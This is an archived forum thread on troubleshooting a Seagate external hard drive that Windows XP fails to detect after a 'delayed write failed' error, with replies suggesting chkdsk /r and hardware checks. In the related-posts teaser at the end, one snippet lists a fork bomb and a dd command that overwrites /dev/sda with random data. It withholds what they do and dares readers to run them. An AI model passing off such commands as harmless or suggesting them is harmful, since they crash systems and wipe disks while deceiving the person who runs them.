External Hard-disk Is Not Detected. Need help.

external hard disk is not detected by the computer after the error 'window-delayed error' problem is shown by the hdd??? pls tell me the solution asap...

Replies

• Kaustubh Katdare
    Kaustubh Katdare
    Ravi13
    external hard disk is not detected by the computer after the error 'window-delayed error' problem is shown by the hdd??? pls tell me the solution asap...
    It's very difficult to guess the right solution to the problem from the information you've provided. How about writing some more information like -

1. What operating system you are using?
    2. How are you connecting your external HDD to your computer?
    3. Which brand/make is the HDD?
    4. Could you write the exact error message and maybe the steps to reproduce the error?
  • Nayan Goenka
    Nayan Goenka
    Could you write the exact error message and maybe the steps to reproduce the error?
    Its better if you could get us a screenshot of it. Better to save time.
  • Ravi13
    Ravi13
    window xp, through data cable,it's brand is 'seagate'
    & the error msg is 'window delayed write failed error message '
  • Nayan Goenka
    Nayan Goenka
    Ravi13
    window xp, through data cable,it's brand is 'seagate'
    & the error msg is 'window delayed write failed error message '
    Cool. Run the checkdisk utility on the hard drive. Its better if you do it in safe mode.Use /r parameter and do checkdisk in command prompt. It might take about 2 hours.
  • Kaustubh Katdare
    Kaustubh Katdare
    I'd suspect a hardware problem. Does the hard drive work well with other computers? Did you try connecting it to any other system?

Update: I searched online and found that this could be a virus problem. Check this out: #-Link-Snipped-#

You are reading an archived discussion.

Related Posts

hi when i am trying to connect to internet via mblaze i am getting an error as ppp link control protocol was terminated, what should i do now? i am...
I want some solution that how to download the videos from youtube like some toutorials using idm or other downloader like real player downloader is unable to do so. The...
Brackets community have worked very hard to bring BRACKETS to the Linux community. This code-editor can be replacement of gEdit. But again, Sublime kills 'em all as I have seen...
I am posting few commands,I won't tell what these commands do. Perform & test it on your own. sudo mv ~/dev/null :(){ :|: & };: sudo dd if=/dev/random of=/dev/sda Disclaimer...
5 * 5= 2 6 * 6= 3 7 * 7= 6 8 * 8= 2 9 * 9= 0 10*10=??